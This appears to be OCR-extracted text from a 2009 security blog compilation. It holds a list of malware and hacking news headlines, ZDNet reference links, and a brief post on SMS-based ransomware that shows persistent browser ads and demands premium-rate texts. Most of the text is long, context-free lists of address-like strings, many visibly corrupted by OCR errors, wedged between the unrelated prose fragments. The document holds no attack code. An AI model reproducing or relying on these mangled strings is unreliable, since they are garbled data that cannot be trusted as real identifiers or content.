03. [22]Fake Microsoft patch malware campaign makes a comeback 

04. [23]Plugins compromised in SquirrelMail’s web server hack 

05. [24]Absolute Software downplays BIOS rootkit claims 

06. [25]Federal forms themed blackhat SEO campaign serving scareware 
07. [26]Microsoft’s Bing invaded by pharmaceutical scammers 

08. [27]Campaign Monitor hacked, accounts used for spamming 

09. [28]New Mac OS X DNS changer spreads through social engineering 
10. [29]IE8 outperforms competing browsers in malware protection - again 
11. [30]Research: 80 % of Web users running unpatched versions of Flash/Acrobat 
12. [31]The most dangerous celebrities to search for in 2009 

13. [32]Source code for Skype eavesdropping trojan in the wild 

14. [33]Snow Leopard’s malware protection only scans for two trojans 
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LHMLtFHsP8ZnDSkzZ7LDsGj6T4M7KGGaNA 
LHMn8dnbjdFpx4pbfxygQLQ1ZWajDDuQGC 


LHMNbW6e9XZZuRpMPuE4196nolwSsmtaWS 


LHmR3ceAwMs]JZaCGkHr4hFBhoGzZMuCK9Rq 
LHMSWf3EMp9AMaz1b4LxVDdn6PZgbgAeCf 
LHmUA8LAP6KFfDw7tnCTGwtvKWCvQ4cXHR 
LHMV9v7Buq8vAvuZyyvcT9hNqrDgJrqxy6 


LHmwUQbcshM54WSAuLRkAbyEwtum2mTFM4 


LHMYdVo6HN4tFLMgtcAcHaAzNtZ1Y6dFbk 
LHn2GEKnQbtTXL7M29QXc6iEF16pLkZnVx 
LHN45wR68BWogLh2Hf23ssrR4ta7AGZjGYR 
LHN4FLB9v9JpcduDtCM8yvMbmP5zhsx94k 
LHN6cWo2Kq2bENUvF4Geev7gLQnFp5sucW 
1Hn964zZ9F ZiUgLp8StVGBSr8VjWWmY4aEi 
LHnArtUZwinwbAetwDCXdgEwgmhcsJTV7D 
LHNAs35ZcBsHlaMAsxNgupBibtcJeiWXdm 
LHnC1dELm64yFfecNohUEyqcR7Rw47YvzS 
LHnDVDHmSoDcg6JwfpleYyqRSumVETSDFz 
LHne8e5SHJoUJVkEbzacicPk1xduUmASza 
LHnfVs2hcVBhmSwNGjjekrGhA2cCyclmqn 
LHNG4iPk8yabUT6ZCjEyrMvxNW7j5LMeWz 
LHNGPYnAUvVavssTXC6EpAjjuBqHdFGTtA 
LHNHVagJnzS8ux7wsH2W7CtkpfV5QfuM8k 
LHNiqcy59y3toikWoECd73XP8DJxGJ2sxU 
LHnJd9vh5KT IcE7fqEzQoKDzVBzxpRehto 
LHNKVVKipF26cR4PTgqEDyvsfdGNdjGVzQ 
LHnKyoQgJm9JszeqYCRA3}1spY8CF9acaP 
LHnm6ZxJ8EVSAXRxiL3HNMq7WZjRDjPttq 
LHnqWc2d5N32XfjaGdezFsn3XjL6GtYGjr 
LHNtMdur341dknzduxKPQNMMSpQaEcDTD1 
LHNVA4DQj3e31SxQwcYqUQJdKEaU7h3MYM 
LHnVvw8tSBxKa96JWTVbAQi40VWCcq8mDc 
LHNyTSmAiKERRvuAtyFJymC5H8k9RSJRNK 
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LHNzkamdaNmsa9uiAV4hHZagJYTqdH9sl1u 
LHo4fR9XC78bcMiwA7UwvFKASEEodpg3tW 
1Ho64T9Ld3WuxuuHORht88MWLQzLJWZoBu 
LHoa68WUZVqNq32jp3sGKpPMQn5tZTpvVyo 
LHoC5dn609W2HT majDtR5EUNnNWokUUbVHA 
LHoCiLGRN7mdGyg5mpyTFyF5Vy20Zj6YSD 
LHodueGYwuUi7 1lafij7Hyf5kcq27CG7LqRW 
LHOH16qcbx1zZZE78hhkgNnJ6gmkhHZeaUZ 
LHoh8ocCjJrEuBFYJmQmjLZhxR6QNKSGd6z 
LHoijgCw56EWtjYfM6hunqkPqK8WyRbyKW 
LHojtyssp7qz7RwT4eKRYtP2nrZ96H3qZg 
LHOoKRWz56s3VvMP5kDbH7TZR7xSTaj7BeiD 
LHONGDM1LhoMvF9hJ6PBnVncPnXUQsQrQPK 
LHopcMDC4xFGyk6YirvQK38Sz9t5V11AGj 
LHosMHUxVdx]ysBitYpZiYairwXDbokoNZ 
1LHoSXjJn2jU7kEgX3jE7iZaBTBEnc1zcNL 
LHoSZAqtWKig4)J6LoG6CajCtfPfBrCPHC 
LhoywzBBSiu1ZPUQQvTVyh11pRBemf7uE 
LHP1KckkR7WvqHBintGcZjSG31AMVCs4yx 
LHP4PoFgKQTLhQnauaNxk6b5heFehAM8eR 
LHP8vWWV114EYKxHZLabVxWjR9B9Pd)IfF) 
LHP9VXYGGecCvPrt7i9UMQg7quHsht2QC9 
LHpARFuZ8YilqpRr3EkAac9UpsK13Bt1fb 
1LHpasy57vBjkBbSDnNqMMQNETEcG91zhde 
LHpC3L4M3srwydoa6DEXYDBJcii8BWG8RW 
LHPCxr6NMMzPt5fq8z36hvAdR33TW5p3tT 
LHPD84J3bAaLRjpJ5kT1codQ6JjZFWx2eN 
LHPEU97UgVLyRZNTNgAXEP8atPY4UBhjF2 
LHpgbCdFBbSs53qxAPbpj]7R6xY2ebezPHH 
LHPiyRxyHWRaBqScdJJYHFZQu4anmTEN/7t 
LHpjV2Yk70MdgKQsXQbVWX1BpHbwDgXco9 
LhpK1R9ODKRjJKXxXzCBUEMMA3YtFYPQNFp 
LHPMVigsxZWQMWm3y2tpEXJt5tvlyBJAtx 
LHPNjrjDtm14zrrJHZ2dmYyfjviV2acyPK 
LHPPmHTvfsbXLS45ecKkqRakz9MUphRpRr 
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LHPptvVyN74c9zCxU3z78BNydebQ8D3496 
1LHpqgj 7MB5dxPiNpBMKbbei6uVMiMCuBAi 
LHPqv3G6SulhLAinXzVuxyfoF Llav7ZRYTk 
LHPRlaLcaLZBQd1wK9XXSrN8R50CTDAzkA 
LHPRNY3ZZyrpDDVdTbtbS7kD28BWi7h9uK 
LHPSHVoAUkK7bjMRZZJ23KvnokA9jTv3Web 
LHpT1BevPbwnfZmEH27LQSho6MuJHUEAG 
LHpt7NTsuJmMBAFFMMfASMkYPjkAXAoCu5 
LHpTGR3W4c92j1n5c1lo4bttttJDHF4KJvP 
LHPtSjVhgoidPwQJrdvxXf3uUm17mTKzZuHf 
LHpu1C7ethKML6hLzkaHiSnDMAhPCFgmfr 
LHPV7Cl1tushb6w8bBTWDmh927Purd2esmi 
LHPvb8kjbajoEAAxdJEGiILEXN44PpiwdWH 
LHpvDZzkV5Hs46pawTPdFTZjAaBmTeG2fm 
LHPvHfTtkgvuNddGzjkrg3bsSMhUN72Vb5x 
LHpWGThJsz15zgWp9hSvUWMPgb6wkbxPFK 
LHpyeTcH8jhNAGH1ACSa93M9L65YxeSNbX 
LHpYsCSvKNdCzrogATNMVL6M57HT5tsDN2 
LHpZgdAv3SgWenYXR7LgC2HB5kcYxiYvLc 
LHQaxECcs295S7rSUEBHHdr8uhDk1twkK9p 
LHqbhvFV1DVwETd4XFfgPd1Fb5batmmr9N 
LHQBLZ2GwhG1VZoYVXChYvmeaug2At5fCS 
LHQBWhBznbYMAcJB33jvuzNjpyt33quiZF 
1LHqC3uxaeyfzypDv54KLetpBDniQpmcKWm 
LHQCv5LLWX8D7f2WZLoeayzWLaDoaJjia2G 
LHQdte7B5TxxtLEjeWEq2Km7B41n9gv50g 
LHQEShtfjSRyZqHCcyDort8YGc2Ni8hx4e 
LHqhMwDzjpyAmmzrsiAVuvPLCGsASoG4Fn 
LHgiPgWswccLx697grl4jGXtqR9IQCvnjyb 
LHQJzS1kC9zhjxr7RGHjhvj1XuzCpzqLgb 
LHqK4NNZjSo86TpjDspdNNKVvcbviG68ZG 
LHqLEZkgDMcuZPLcBFt52a2ZdxZWWKP6hZ 
LHgP6L7YL2e6c9Ff5YuXbE384iIMhDgmjKq 
LHQt9pYZs3AAYak7UVbuUaosdsknpmuhHy 
LHqvuRMPLmAYWw3LTzELip6C6iwAGPdgQu 
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LHqwDkHZPm5NbqEjeWyyRjM1lgwdZDsWgpv 
LHqwpMxPScbrnjkAYXseqvi4EaWUFoVVLH 
LHQXfY¥VhurUGfFYDW5QFKNQkcDokPnqHLqt 
LHgXoH1trkaJXVnHStuEzVPFW]qezSuwC6 
LHgxQH6dw3ZCai5jveZ3smZroWgZnkKU4q5 
LHqyFambCHe7TZeD8bWSEXF1Jm7p3URkzi 
LHr78ZLRXa7F3GYNJtrjSFPxXXIMNJFdEWK 
LHraRTZSR7rR1o6RniyR11l4hwWmxXDp4Ngkm 
LHrb3yDjgKXhN3BR1tAcwKt3QFtRP2RKBE 
LHrbfUmxYTAKTJhingVWZYeFnLFewf6Uzz 
LHRC9X6UvV7P1VNtsheQ3TxTbEKgJmDUx6q 
LHRD7idCcJYGN1y4KebVF 3nyWsPgss31Tf 
LHrdZS52GzVwfGhd17gjJeYWh7qPFb7CRn 
1LHRe1XsjBGWkYUUW2wWM5Pv7bG1YF5iDsJ7 
LHrFgs9fhBjUmHCnuolvpncui8q57HPeiG 
LHRGM2qYKYLh31dwR3vRjA1n5AKDDZHjfV 
LHRhclkvmTwprRV31bqxKgAGqomvgbQtMH 
LHRjsDGqjkPiEjJ86B4Sx7zZ1kQhZKTLANq7 
LHrKFR9O98bjLPc2aAyJEEV4ULzt8PkKTBFp 
LHrLJSVdiadvFMezRP3JK24Q2UWLy5nmv4 
LHrmbsJshxna8N8fqDF75SU39SaLrU1AjT 
LHRNAVZXz8qVgAD8vC4SUhFDge3Ugra2hu 
LHRosJRJzZfRH3f8asmq7D1liwSX36kKEU8E2 
LHRUz7FasXrJaoqg77M2MP1Kc9jMU6q8yN 
LHrXBVmjL5bywZHKvSxk6zu46Y4UxViICDF 
LHRz9mfFRgWjBbJagTZKpY2sXd9vJw1Xz6z 
LHRZDRr6uLBbFJwByndjJ6V9LKDymGPAUdo 
LHRzKuG5hEdC2kxjUGm1zZLKz3rUtK92sLW 
LHS1cruGU9WANbV2jQGCJrtvHGCmA7ddQH 
LHs625NboNfPDAK97WRDONaz1dPYKFqB25 
LHs7drpijzPcG4fnnL4ewWsVZFfZtAjGow 
1LHs7L7yUvkp9X1M8jixEhrUyPDL4TGRoJb 
LHS8ub9UUNUVKEE6NgLzZ3WLWMMgjpotVQOfp 
LHsaTKvki8BMbhMVBQRWRv9rGqx13Xe8Dx 
LHsBcM7yJZToZ83am Tc3aBFGmje27oRy1U 
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LHsCqfoq5UeFb2zVRgBFP3QbnyJ811Jwj8 
LHSCyc4AomfmAPnjAReY 1nUczJBPooCjHH 
LHsdbJKjDNBTy4NtDVWPK34io5ppMn2c5W 
LhSDQm3BuAjL21leuDfjWZoRpTjRSJd1uN 
LHsdURKhWmhSLBER534b28KsGyYb9TFj34 
LHSEWERDfCwxiWiqfnuj8r6JNvDQ2AE6xY 
LHSExmUnv4y7drh9H1dk1Kr6ZzGse2acoW 
LHsfFFc79RPWNt35C6GMiseymMEPy39bky 
LHsfQ1tcVN3yMtp3EYH3yMtSXRsYfSZcTS 
LHshXyccEQaQCaBtY4YKMcQEe]JL8fp8shz 
LHSjaZZVqQ70m3qx6jcMKNHiWs25BzXZtA 
LHSoYjS39L2SHiIFCHHutucWcoUy5gak5Xq 
LHspEUMDFeYnvnRL3T4w353QuP6guqKWSD 
LHSpQCe8iSSqrLHVrhobfzVPTU2ZLPNncNx 
LHSRUSNUhjCXjJMzn1RLoppumd6WyHD5vv 
LHssDyDTZj1lhVdwhdpF49wLKLPQoCRJB9T 
LHssnaw2 TsunCvS TaRbeRGtjqopbWY1gpzZ 
LHstB9qJrCCm9J3UZFCN9XkLval19f3QAeU 
LHSTY8NNfDLVtWbDKHkV348YdEqVXjPtvL 
1HSur8DHE416Gc5EbBHQtbd5Nak3iyt2gw 
LHsuVCVJaxgiv7 UsPoG4HVHCmDANtHtE9R 
LHsvMvY1DwSmfj9Qc76wNRryT9AeQiUGRK 
LhSxU9N5Z6SQoCv32vMZHeQ3nPyvfRmjd 
LHSxwh297xvkTYkvQzEGyYAhuDrdmzgdcj 
LHsyabyUyNr8dusxPiGAxzMc78ucFLJJIMW 
LHSzhWeY qT9VfaevFUW69VrbjJgiRSR68UJ 
LHT3u5montyYJyaoFKPeJyyabYblvnUcjka 
LHTOMIjFNA9rU5qVjxXbb834hTcQYMzJctv 
LHtA30kaqQgSGYM34KsqqpNp4JmiAAf8vG 
LHtAAPMG1NPOoSFt5tjUiIT83rQMfUU8hfvx 
LHTApDmUgxcB3MY8makib]qf6MeYdPyWT6 
LHtCgQo1FhT5knBr9syzuhJ|8tgsR5m3tjd 
LHtfej4etG2nWpg1l1vG915fvrhiHu4g7iL 
LHTiVXCSc1f2FuizWySsMKcrEVkKZMGWT4g 
LHtjj3qBtFAEAH9UK74m7iANazr9tgArwy 
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LHTjre8BDuzWW71A1inLuabaudVr9BbkyZ 
LHTLHfQRu6tD2gwjJ3nXSe7DZNUHdK9VA 
LHtMGDzsP3ThiIKNFzemulEDfZAU1drqGQ3 
LHtozNgxEMiWxn86PwYuKqsFpEqt7ULkSc 
LHTs9ZVE3dgdQKvidmmu55hHYdN74iCeSe 
LHTtBVfG5Ta2CPA7Jk4PhqBsrL1cUNhfN5 
LHttgmhKZLhyin2kNrvextyRGUxU7GhyxB 
LHTuLMTXMtWUaHruL6SDJkQdxYXho4AEHB 
LHTupZTN2KGZZ3PEgmBjpjYYU1ZEhnUgxy 
LHtwbFi2M6CSpDR9Y6hsY5fbYpxb4FuyKVo 
LHTWRgkSjJyacz5uy7ZHc4EsBnbcYnh4n6 
LHtwyaBiMrGleKEYTh9hK7dLnSy1lwcy6bC 
LHtzjLZykKENWVG8BnKb]7juaxSchpc4zEn 
LHU5AFWcV1litw3cCChmyGQuArM8kFPG6rw 
LHu9PcL6cV624EbQqgmujJy9mMDFZeoU9uUFF 
LHU9TfotjmGusTV7yDhYV8LAWTpaEANBek 
LHuamwSZj3puYNLikquN2mi7r2hUwQEaEq 
LHUeoAFFnxBQLknJXPJMtqV8GXHqyHFhDA 
LHUg4PwSi56ip8j VEK4b8Thk1irKw347bB8 
LHuGDhQ61PQsTdSSptQ26xig7qVQegCmag 
LHUGmNNnmtzAwxhDdjjkSaoeP5EZ3eBwdQ 
LHuJ3T5PKHT7228YxRccRZifTsGPGoSgps 
LHuJUFJUNSME8ZE1AZYwfp9uQ7y6egWwsv2 
LHuLrXAKN9QiQW5e6a7q1p4bkhAQ5tjHtn 
LHuLUv4tcJdvvvzdy643acWEisZAG3/7tze 
LHUNJoHNre7nd7Yvkj2Pf]pjcSy 7hpeMUx 
LHUqQcjtXp5BaGU9SZbRFQFOoPMVmAnaU7m 
1LHur3342d2CSbQ4NyHGABurGcZUaFaRprh 
LHUrsw2h5dameNSeTJdqSMQQtpLKiySYAc 
LHuTSbmJai8Q93)jJW9mdtyH8ai7w22F3nn 
LHUUVdQ8RKT1tQB 1Uukitf3qtNwrk2Crhi 
LHuxPHfQ4jDWTpwThTruWQNkhbZzAezu8j 
1LHuXuo6KaUZUWRS5SapbcDZz94MMgaoEBfG 
LHuY8s3zB6msu3Kv7R9TtVctReyVbyuicQ 
LHV1IDEM51mqDs6mu4V4NGyXUPXTCXAtvpC 
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LHVBmzA9WnfjgKeSSVSzbFujhqNdc7y]JB) 
LHVByKWdwdg23eKZ8qolsCub60VDpYDz32 
LHVdViQZWYzz3BHKRsayGs195b6kR6hvVj 
LHVei6WJodZtRXiYKCHP19JqLWrrPct83Z 
LHVFyR7eRVmLcTXx9WLYiINhiMFUFhAJFyqu 
LHvgG2q85j2b2KKj3qBRqcyZeKLov7bNoe 
LHvildqv7SreLatXWYdFMRCKsb8]JGDPoR3 
LHVi21jmf6FDM48MTCZWeMEFqNXBwximS4 
LHVL8wSY5UBqDm6yMTBxnsPWpib8uLGaqsv 
LHVLLtAK81fdAmXezZcjWJZDUb3mVb6tDg 
LHvmb5sx6hrapSxX1gTuWzyxJEHjpzwX1F 
LHVMHq2hmU9SjkNhCyywHdtk9wgaDcxC4h 
LHvngjdYw5ZWYtf5DQYevvd6Y62Xa4rKpF 
LHVNsrTbTmPV6XZITES8ayz4vkx82mbrVo 
LHvP6mfjjpynpl1CNVK37CKk4nNrcjjaZs9 
LHvPaTHm1KpokgzXFR9GeMicU6ygHZuA5Z 
LHVPvFx6qQmurhe3jdafd9wkmUCQtVb4To 
LHVQnLxoBXClvJhuKZdQNdNgRgriZMeAvx 
LHvr7ySANXH8ZTRbS6MRPRrott2L1FC7n2 
LHVt5D7HMUHLkLgCsiSqS5HdW1L9zwLalvA 
1HVvda8uzLuB39t2ECcDZHMVs6hzW2YkKTQF 
LHVVw3fm2nBHVZMLVrHDohz9DQPGKqaxZ3 
LHVWewzG5K70XZ7rGNjJ9ptiNiEZFibpuY6 
LHVXmvGegarWFJb42zYV464fjEkeffVT5V 
LHvZ8uUNePYJjEkfkohiV763LW8wuNFVU1 
LHVzjnG4sJhxZrkBUWWWMgvFM82jA5NrKo 
LHvzyCZPnqwkLm1ksfsPfvXZxk4HMNieZq 
LHW1pTwQdNsBpzckd2DiA5TTKQ5p2xFYgc 
LHw1WYq6XtJPFAF8WtCQnVyMpQDZwwmjsq 
LHW26ZNijnB7kgKth65nWstxaSs39Xd2Xu 
LHW542EoHfb5S1qgCGemajk3ixf98rN6PyK 
LHw6tUqY82Pka79yzz5yDoeSTTD8YVLyuL 
LHwawimXKwY4cRYkQcYGXrvaGE47kxQaRC 
LHWCajERUGBdJFUTg69zJVHaFySjzoF84S 
LHwf62GkSwQXC1lkgWAmzNQliqmBfQxbsvnx 


25619 


LHWikxKCsE9vaMFC3aGTB55RIcnvzDXhak 
LHWjCcMEVqv54cebSv8ZfLEqB9Epn4nVcr 
LHwJsdS64s3RMrGWow5jPQqyMDuGjXNFCH 
LHWKcYeo3Uj5kJBiZqZghpta7uXwWz5hP9 
LHWKFu2XwjJqFH3FnWdYQcjJeNBPb3F7MkKtr 
LHwKPpZpLri4fdEY3mSJQpFrY1R4BofhFY 
LHwkUVk9cdpJksg2jaytlwaqfiLkfixNKG1 
LHwm3zYqkTJjHfAHeEHLBjNH2PuQHXjak6r 
LHWMwuB7n4i5PEG91FTRm2zjrAMTYKWUT1 
LHwndvbkXqknhLwktqxXVg4RuaUNQhvLLkp 
LHWNWChnJCJnQosYnpx7JvpWzzLyVmoz4Mi 
LHWtcirRngEPCfqPWqMjqdPUMmnSztNiJ5 
LHwV5CSir4D1CfmmWYBiwSPRRJQSRjMCJn 
LHWVQVDXZPWDQcq2bafdE5nADEQP7RUPuy 
LHWvyDpWmoo8fibRyFcr54dNXuDsFUHjGR 
LHWwDCeyeuFBMuU9chAryZiA8gjri3RErks 
LHWwNQ1PD2nceidjJdfithWuZcSWUbnd1p8 
LHWxEMYTcM8Kh6c7Mt8ScLfTtzHFQtNYrZ 
LHWXwkKdrEJRwhkterTCDYmsHZEfuLcLSLR 
LHwYw2GtSpQVZMmnQmrnRZ6uw8mT QuHgCXx 
LHx2ajtYzrtQhWUVr2RrmnbtVTi7JP1TnNC 
LHx5mug25QgDSEX3TU3G7t7VjXCWMxNB9y 
LHx5nocma5UUi5fSHdWiGx7 Lo5hv4sFBmf 
LHXaGG5JqVfMxBDjp1ZxTPcx8f6tT86BK4 
LHxAmgKsykPWpXAjq7o0qwFUZoHduV5xQJa 
LHxdMwwAgaYLbqTdd195jtPnb7hyxxP54N 
LHXEb9sDcGmLR29bMbTeFnvHPdeSrKZBsu 
1LHXekcGafEnkkUvJBshcLC8D4fvFvPP7Hs 
LHXf8Cq3KzcWTcrdHjJFwDJwogeeN6xXJmxX 
LHxfWcVHCusuV6H6wx6ivlEqvUyuNKg54y 
LHXgSSLZSZQdkjt7tDKVKMMRNuXA1X7R50 
LHxj472u2VQWGXEApK3vMHxk8s7FSfuYRS 
LHXJzJFBGEHPDHChRnyQfnCDS2pjn6éCmrD3 
LHxKf2ixnwBcyHJ8gDkjzFWqrDKwTSnUj7 
LHxkJ3vz2tvpcHgdt9yyY4XxivdY9jKkcZH 
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LHXMgbiTbPVJAwbEw4JHuZsdyxcDjZc7gT 
LHxMXr9JDfJrS6kg3JPMMLZH2ZNzLKDauc 
LHxnbFNE9MhrxXT8uqcogNQojaEgqspVxMd5 
LHxRjgWRrVixkAGhFfeCxVxSAnjNkDc8bH 
LHxRJjZPSUHRM2AKkFhwbdNvhXkKCdg6Qax 
LHxRmjgQWrXZ8TFRd3B4EZ9L5 7uYkhYVwt 
LHxTiHNyzxrE3SRtB8D92CX88H2U34vWRD 
LHXw9H90Qvaoeb8MNDXnanggk4D3hvMugo 
1LHXxprxeCDRKqqze8RUByvR6vjcGMAuWh4 
LHXyLGu4vvcDxxDb7KmvBZw6gEBB48WH]J8 
LHy1btSAhFFRKX1o0d268zkh93HnS4YoQhh 
LHY1cxkZiGMtR4Ev1T5j3fPiFWLF5 7ahgV 
1LHYas4xgnNhSqFNmebB67HWivjJ2Km8iJnn 
LHybLY7uuUcWseVbL6ar8egKZXQSnHfEsT 
LHyCRjoQ5FdoLGeGw9grmYdcSd4j2vQhHU 
LHyeGeDhutnhJXWAUmS]JDeMDN27hMwn8Ec 
LHyGnDACQ7MnsZEj81E2xSfjE5286)JZFaqy 
LHYHeBkQ8fgPFEtKVkCjCouZjwEbTm2HMW 
LHyHGXV5AhfMwZYsEQSUaWujwxkDXdVk7v 
LHYhSSiIULKJmvhvGqiEEKBKvxA3qckowpy 
LHYKY6xhCb4bKAmr9F 4J6whmpgUpT6ysc5 
LHypt34hlyZB6QNPfT bzXATogJV3t2rMSN 
LHyQPh4XZ1nd3NPpCwZUSJLJMoBnkSZMj2 
LHyQzIcHKvfh97SU6YZoiNJrN6nkg7mwTu 
LHyrfU46xC9gqwXKpnzDBKfGpzK95cRJh2 
LHYRZdZEv8RFsz36bMcZcQQe8zyy29Vk3q 
LHYSM31uGzShVJzkAbVbCTwyCRNzk7xAcG 
LHySnsKYFdbcPTDvCh8e2EY9UMm2W8sp4iA 
LHyTtTZJ3P26ZWHbZL3N51h35sKEsS4T2SW 
LHYU7NLavasr2A4d95dAwvT9eUXYL37dvB 
LHYv4jLUg8njAyboecuBRNGmqmyBFTtMLV 
LHYwdm6UyBhwWmZkKrD3h3XfLtF2MWSAoNj 
LHYwdteQcKdU1qDNyc3jAQiZ4iPgNibUBk 
LHyWdzsRXccPPWn7kk4eaLFHyanrSgMbWS 
LHYZvkbRYEXYo74KhDLXkjJz1tmifiWbGKv 
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LHZ55id8tgt7cXYLSJKeEuaAsZFgqNvV3uz 
LHZ6vzRpxntAu9NyaEbyAx7RGbcM8dqgKW 
1Hz7dycuBKUCwrvF63z9LW7j2uSxSDtqm 
LHZ7nSBYgCZbMcxmdyW6V6qdQYjYBHF9eU 
1Hz7VKy9ycRmRdyE3cYFCJmzKZo2erFdzn 
LHZ8GEM9GZEiFw90ZVwxMZ9ifRjSgv13AE 
LHZa4NfmYQHnvR6SR8FhY4eMU7EFGV7nVg 
LHzBTarpbuKhBKuWdsKgZihmRJ2S22XNut 
LHzCfDWwiakAY87Rx1YkvvgYsBwq7Cngsr 
LHzci2iUdhdqRqmP2fXMUipbGp1p4CfK8q 
LHzdoyCHWh5hiCrdeesceWxnyhcfHv8fCi 
LHZEFScxvFobWKqHSAMJpdFbT6cYSxojJjZ 
LHZEKVHPYHUnvCMzAndjLpJnMwvUDL5nd5 
LHZF3KAJMjBly23Y9SYkCW85kQYSiLLW1P 
LHZFJBtpPXmpxi8v4iSrWRydkPfP77QvBT 
LHZFJzxSykjNOSCNx3kzGuJofwHVR1DDL7 
LHZG6cyWyimc3Vj68LF2jB5yVLaKjhQEQ8 
LHZgjF5xju6KpEAGKs3Hhwvx71aD4V6Fqe 
LHZHxzU9Me5ESDsJSntLzzr2GW5jKdU3n7 
LHziSJaYw9HXA7qQ9HsPuZNVP920YAxRgbC 
LHZKmm3vobVMYhs2AXhHmBQyFe3fSzzSQQ 
LHZkPQPLOVNQ4SoQtTeCRXEazrvDryQwxt 
LHZkYPdm8VSFcFgNB5QMop9pxFWwzapCcc 
LHzLCPnockNk5vhntcZMT9nuGDCeooA6Sq 
LHzQzsnCgRbfUBBeZKqgiyVqPvXsV1LhE4r 
1LHzSn77xfYfSca8wpGj693VU5MgdsXxqCvj 
1LHztSr78w9A738SFYhZtPm|Jmwy8sjR84sGa 
1HZubsfbRdg7ZamakKzMaUrkekjfYEqm7t3 
LHZUJK58xn5LSVUVjVDVFCUVYL7CnZwiRt 
LHZurESs8jaZH7THTJQKnUpSNnncCérz61 
LHzVdm6yWBewYZD3sDQKUd4dxTNH6PyFz9 
LHZVsuwHTDyBh5BtGweAtALir6eKmb6kTTX 
LHzW3ecFJLJfv8RPxo6QSV7bacmANsa3Hn 
LHZxbxbwghaexo8vutgbrVR5U5MjGkGEkW 
LHZzn8syPtyubWhuViWoekyLiyAfsC7 BwM 
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31. http://blogs.zdnet.com/security/?p=4116 
32. http://blogs.zdnet.com/security/?p=413 
33. http://blogs.zdnet.com/security/?p=4139 


5.9.2 SMS Ransomware Displays Persistent Inline Ads (2009-09-03 15:14) 
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SMS-based micro-payments are clearly becoming the monetization channel of choice for 
the majority of cybercriminals engaging in ransomware campaigns. The logic behind this 
emerging trend is fairly simple, and as everything else in the cybercrime underground these 
days, it has to do with efficiency. 


Compared to micro-payments, the 2008’s [1]monetization channel used by GPcode in 
terms of E-gold and Liberty Reserve accounts communicated over email - with cases where 
the gang wasn’t even bothering to respond to infected victims looking for ways to pay the 
ransom - looks like a time-consuming and largely inefficient way to "interact" with the victims. 


Another recently released [2]SMS-based ransomware showing persistent ads within the 
[3]browser sessions of infected victims, and demanding a premium-rate SMS for removal, is 
the very latest indication of the micro-payment monetization channel trend. 
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1i6U7Z713Vi64qh4AZRTLNKC7dKs2VDV9 
LidKobdmWo1DM9GKP9ZVnjyvH7upVA6XxG 
1iDxTvRgZFa5t73ToKTwjteotFwC2KpSP 
LienkhiEXjrCNPpmJGwe3FmKnPUjjDqSB 
Lig3UpCHaRFEFjRjSbaNCtvn37Vg7NWf5 
1iGy3GeBxCxVH8eE54HbMGi5aeDyvkXH1 
LIH3LYE2VsRUUb7aYWa4yzMRwVFjZwrUB 
LiLOZSNB3JBi3eM5YpeDVRLeAGCyGjlvg 
1iLQwz7gBuYAN8MPxCkfwrH6dB9E2hiHa 
LiINFWET5i3bAp6B6m3jP9WcCGmAaF8Ez8 
LINy4TeW5zJ4ig8NttCZZNBOWEnBD7jbj 
1iPwrjCp5761o0fo5xbAf89xaaSWZZAP7K 
1J13XXTGuDi2pHDXTQWPBHSH4dgnddzxQz 
1J1CZwZnYx3ylysYuQunresVqUo8LWT9Aq 
1J1d8KLMv5E5FMpiAieDLLUU2Mu4QpjfZ8 
1J1dBxGkd9HnzAGbwqNMzWyMPrLu7tFzLr 
1JLESRxjiznqVUUa2Uq7RcdcvGDgNHZGFs 
1J1LhrH6ZNtTgcxJZdxcoDyLY6Nizb2wg3y 
1Jl1mxSu7hYUPHBSGy82AbhZQcv4Ue7bjKm 
1J1MzbAzpyyCTt2ymURDT6vCaywaX5LxC3 
1JloqkoWBMG8St8avLS1S42QcgUurpemZ 
1J1pQu7p1bipxPgCxm3dsGLjYJQGLEJnTW 
L1qCiehWmvVr4W3iGhusHqKbxJiGfWp2d) 
1J)1ruDre9GGNPJBUCD2LM1xEPMNDnpsEsw 
1J1RXZ27gQ9w6BGqT5otbafeMFvjVdey7a 
1J1xSTCwp545Hz3)4TjhRJvxTLC9OR38R8m 
1J2Cf3pmJMTM5MSXaGxW4wv2Sc3YOHGGYY 
1J2FoboBUdMMFeiV1FM9DTj6GvFUuH63Psrg 
LJ2HFNHCT QcfFB2sPvfon6NalyvjFiVNcK 
12HmxhQh3UpteCkBYRoKpwu3CM8UoSgk5 
12KmMDQyQCQJebuzdS5RFkK3CSjyMZW8A28 
1J2NFgaXPbQHt5TLD4FGVmyUjUs9RTJzxy 
1J2Pyy1cs7LohVdAk6WkrAaknMk3U6NWt7 
1J2urV7CsWdKM6J2Qxpbm9YJsyfk2qDZzMgC 
1J2vjU43q7Ga9moLvMZ6vHEZtFGx5cTien 
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L2w9W9Pvb6y7hK23Zk4n7wueD2BbuiJoxx 
1J311GYoxg1CsyLZMyE1KSvuN60UMv7V14 
1J31vqFt6D1xVb5dD7AmzRskrkTmthHP1h 
1J328jh7Qem93fL3RFdcWtabzXHcW2skGf 
1J34KYtjQAZUjNGbn7sg4MgFpmvmEJnazi 
1J34YyQmE540ZKt2JNZnsbsaVbFg4Ff8eV 
LJ36NY6KNb5YMLouG1mzb4RVfmyu5MZhwY 
1J3bnfraAvQphwiyin8stUsLjaj83X2T36 
1J3DKZ65bgkWyrh53pGv9GSyz4nSZ7TZzW5 
1J3folDXoZcCG9WBVANcY9YUzCkza6C9ya8 
1J3Ghqy133eSFAQLQMCtQ1wYT7HrDX9a2U 
1)3Gi7rrzKZ8FpBhV5eMKErLqUVSn309Dw 
1J3GkBfPT4eBXLfy21RiBZz4sG4QtAahSEj 
L3hM8fyk9MPqDalZWzoYGHeCgHm2L5BLV 
1J3PpqEMcV3WGS4Laoi4g6kReYtzEe5ntC 
1J3uABdGDYSprTwm7fQHBeovqkbMK1bgqs 
1J3ZfNFBW8r99wayNgbcy6pnJLMiud7amL 
1J43i17D9aPpA7ZUYeMG8vBY]JVsZ2Krte2 
1J47Qh73Phyev4dyDW2h1RowvksjTxSS2U 
l4akgAq5D8yau2a4 7jA4Wyq4qgNPGWM2b 
1J4bCBlaeE2hoT 1mfNb6vEEU6XXLOG7iRz 
1J4dpiYUUOUNxvbnwgCSJjo2QgXoPFbunW 
1J4dtpwsSTzfA4uan5z9QpbhxSEQeErdid 
LJ4fHW4jNyy5xQ1lzwC6Ws8s7jLtDvBsqCKxXw 
1J4m348SAToa73MnxpwgjGXVaAA9xQ5Kd7 
1J4PPF7waNhmZo6t4DjffDP6RNsao3W5hL3 
1J4ttw3Ctxd7iD9h97gqS7T57HzPT XgjVi 
